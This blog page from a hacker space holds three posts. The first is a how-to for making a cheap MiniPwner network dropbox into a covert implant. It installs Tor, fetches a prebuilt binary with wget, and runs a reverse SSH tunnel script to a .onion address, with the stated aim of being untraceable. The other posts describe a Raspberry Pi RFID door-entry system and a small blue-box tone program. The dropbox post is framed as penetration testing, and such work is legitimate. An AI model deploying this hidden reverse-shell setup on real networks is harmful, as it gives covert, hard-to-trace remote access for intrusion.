MiniPwner – Evil Network Dropbox

By | | , ,
Leave a comment


The MiniPwner is a penetration testing “drop box”, it is a small, cheap, and simple but powerful device that can be inconspicuously plugged into a network and provide the penetration tester remote access to that network. I purchased this device for a project here @ NESIT and thought it packed quite a punch for only $23, compared to the pwnie express plugs which run upwards of $500. And at that price you could afford to lose one or two on a pentesting job and not be hurting :p

Some of the features of the minipwner include:

Atheros 400MHz MIPS CPU
32MB RAM
4MB flash
10/100Mbps Ethernet interface
802.11b/g/n wireless interface with one internal antenna
USB 2.0 port
Micro-USB power socket, approximately 1W power draw
5.7cm x 5.7cm x 1.8cm dimensions
Nmap network scanner
Tcpdump sniffer
Netcat Hacker’s swiss army knife
aircrack Wireless network analysis
kismet Wireless network analysis
perl Perl Scripting Language
openvpn VPN Client and Server
dsniff suite of sniffing and spoofing tools, including arpspoof
nbtscan NetBIOS Network Scanner
snort Sniffer, Packet Logger, Intrusion Detection System
karma Wireless Sniffing Tool
samba2-client Windows File Sharing Client
elinks Text Based Web Browser
yafc FTP Client
openssh-sftp-client Secure File Transfer Client

So after doing the initial install of open-wrt firmware and configurations for the other applications I came across an awesome article on SecurityGeneration.com which described some james bond type shit of having your pwnie express connect back to you over tor so you would essentially be untraceable. Instead of having it connect back through ssh to your IP address you would be connecting back to a tor *.onion address. But since I dont have a pwnplug the only problem that lied ahead was to convert the instructions to work on this minipwner box. Now im not an expert on getting this shit configured properly so i relied on some help from friends and general guessing to get it up and running, so your mileage may vary.

I’m not going to rehash getting minipwner onto the tp-link here, so i’ll pick up where his article left off. And im not going to rehash getting your tor hidden server running, follow step 1. on SecurityGeneration’s article if you need to figure it out.

First thing I did was get tor installed on the USB drive (which should already be setup with the original instructions on the minipwner site)

opkg -dest usb install tor-geoip

then symlink it

ln -s /mnt/usb/usr/share/tor /root/.tor

edit the tor config file

vi /etc/tor/torrc

Scroll to the bottom and change User tor to User root
next find DataDirectory /var/lib/tor and change it to /mnt/usb/usr/share/tor/lib then save the config file. This changes the logging to the USB drive, otherwise tor will start and start writing to the minipwners flash memory and soon it’ll be full. You should be able to start tor with no errors by typing tor. as long as it work you might wanna have tor start when the minipwner powers up.

add tor to default run level (startup):

cd /etc/rc.d
ln -s ../init.d/tor S99tor

Now the hardest part of the instructions was to wget connect.c and compile it. By default open-wrt doesn’t have anything to compile programs in their repository, so it’s a clusterfuck because you need to do to cross-compile connect.c for the minipwners MIPS architecture on another box using the toolchain shit , then send it over to you minipwner and pray that it works. Luckily I already went though this and have binary ::here::. I’ll write more about doing this at a later time. So, all’s you need to do is:

wget http://nesit.org/files/connect
mkdir /usr/local/
mkdir /usr/local/bin/
mv connect /usr/local/bin/connect
chmod 755 /usr/local/bin/connect
chown root.root /usr/local/bin/connect

Now we need to get open-ssh on the minipwner:

opkg -dest usb install openssh-client-utils

Then we need to edit the ssh config file

vi /etc/ssh/ssh_config

add these 2 line to the bottom and save the config:

Host *.onion
ProxyCommand /usr/local/bin/connect -S localhost:9050 %h %p

Then I made a simple script to automate it to connect back to your hidden tor server
just change the blablablabla.onion to your .onion address and the ssh_user to your username

vi reversessh.sh

#!/bin/sh
Rec_Port=22
Remote_Tor=blablablabla.onion
SSH_user=anonymous
SSH_key=”/root/.ssh/id_rsa”
/mnt/usb/usr/bin/ssh -NR 3330:localhost:22 -i “$SSH_key” “$SSH_user”@”$Remote_Tor” -p “$Rec_Port”;

then save and chmod

chmod 0755 reversessh.sh

If all goes well you should be able to

./reversessh.sh

and on your tor hidden server you can just run watch “netstat -lntup” you should see:

tcp 0 0 127.0.0.1:3330 0.0.0.0:* LISTEN 15007/sshd: anonymous

You should be able to

ssh root@localhost -p 3330

you should be connected to your minipwner over tor 🙂

If anyone has anything to add/fix to this please hit me up illwill at illmob.org. Thnx to |m| & inhibit for help on getting this working.

RFPiD – Raspberry Pi Access Control

By | | ,
Leave a comment

We’ve been working on our new door entry system for NESIT that will allow members to enter the space through our sliding door. This will replace our current Arduino RFID door access system. It utilizes a RFID card reader that checks the tag against a SQLite database then opens the door by triggering a 5v relay connected to a garage door opener. It also tweets when someone arrives @ the space to Twitter.com as well as logging the arrival into the database. Connected to the front of the device is a small 4.5 lcd screen connected by s-video port that plays videos when someone scans their card.

The door can also be controlled over GoogleTalk with multiple google accounts. An authorized user can open and close the door, add or remove users from the database, query the database accounts, check the current temperature, callerID lookups, geoIP lookups, play sounds/videos, and send messages to it’s twitter account. All this can be done right from your cell phone or laptop.

The door also has a PIR sensor that will sense when someone’s walking by and asks them to press the pushbutton on the front if they want to learn more about NESIT. When they press it, it’ll play a short promo video about us.

nesitpi

A sample of the base RFPiD python code is available here: Github

The idea:
This project came out of necessity. With the amount of members we have, it made more sense to make an automated door access system, than to give everyone keys. We originally used an Arduino for the last 2 years, but we wanted to be able to control the database of users easier, our current setup wrote the users to the eeprom of the Arduino. We were thinking about using an ethernet module to talk with a server on our network but if our network had issues that would prevent someone from entering. The small footprint of the Pi makes it a better choice than to run a server fulltime. Our modest server burns through around $200 a year worth of electricity. By comparison a Raspberry Pi consumes about $3 per year. With the Raspberry Pi we could now have ethernet capabilities, could store its own database, gpio pins , video output and more.

Starting the project I needed to figure out how to interface a RFID reader with the Pi. I wanted to interface it with the UART pins but due to time constraints I ended up using a sparkfun USB adapter with my Innovations ID-20 RFID reader. The only thing I has to do was monitor the USB in /dev and receive the RFID tag ID when someone scanned their card. To do this I used python script that monitored serial connection on /dev/ttyUSB0 the base of the script which I have posted to my github account and used a sqlite3 database to verify if the card scanned was a valid member, if so it would trigger the door. Also used a RGB LED to notify if the card was good or not.

With the RFID stuff working it was time to pick out a good enclosure. We had a few old outdoor phone boxes laying around the space, these are the same ones you would commonly see being used for phone service hookup outside of your house. These were perfect because the plastic is thick and sturdy and you are able to lock the case. The first thing we had to do was gut the inside, which consisted of removing the electronics and dremeling the plastic to fit everything inside the box.

phoneboxphonebox2

Since the Pi supported S-video out, I found a cheap 4.5” LCD screen on Amazon that was from a car backup camera system that had S-video inputs. I cut out the front of the box and fit the screen into place. So now when someone entered it would play a video corresponding to that user.
phonebox3phonebox4

I also started modding a python script for GoogleTalk from mitchtech.net that allowed me to control the Pi from my Android phone by sending it commands. I also added code to it to allow multiple bot admins, allow me to add/remove/modify users in the RFID card database, check the current temperature, callerID lookups and geolocate IP addresses. Also added Twitter capabilities , so when someone entered the space , the Pi would tweet who entered and what time. Which served as sort of a backup to our entry log, and let other members know who was currently at the space.

nesitpi

Originally I was going to use a 12v door actuator with our normal door, which you will see if some of the videos, but we also had a sliding door that one of our members decided to hook up to a garage door opener to. So now all I had to do was interface the garage door trigger with a 5v relay. I also added a arcade button so members can open the door from inside the space.
garagedoorarcadebutton

I added a tamper button inside that would send out an email alert if someone tried to open the case, it also curls an image from the IP camera we have outside the door. Another button in front that would play a promo video when someone pressed it. The final thing I installed was a PIR sensor, It would wait for movement , such as someone walking by, and beckon them to press the button to play a randomly picked NESIT promo video.

The power for the device was a power supply for an external hard drive. The great thing about it is that it outputs 5v and 12v natively so I didn’t have to muck around with stepping the voltages up or down. You can get one on eBay etc for about $7. This helped because the LCD screen runs on 12v and the other components run off 5v. I installed a mounting block inside to help run all the wires to each device.

RFPiD-inside3RFPiD-frontRFPiD-front2RFPiD-insideRFPiD-inside2

All the python code and C code runs from bootup and/or cron jobs that check to see if the files are running and restart them if needed to keep the device running perfectly.

In total the project was around $160
$40 for PI
$50 for RFID and USB breakout board
$20 for LCD
$30 for used garage door opener
$3 for PIR sensor
$10 for wiring,4gb SD card, LEDs, and resistors
$4 for Temp sensor

To be continued….

SlapBoxing

By | |
Leave a comment

slapboxing
A small program in MASM that simulates the old phone blue box (MF tones) & DTMF tones. It essentially plays the tones from .mp3 files that have been modified to act like .wav files so the file size is small. They are then embedded in the application as a resource. You just press the button to hear the tone. Download it ::HERE::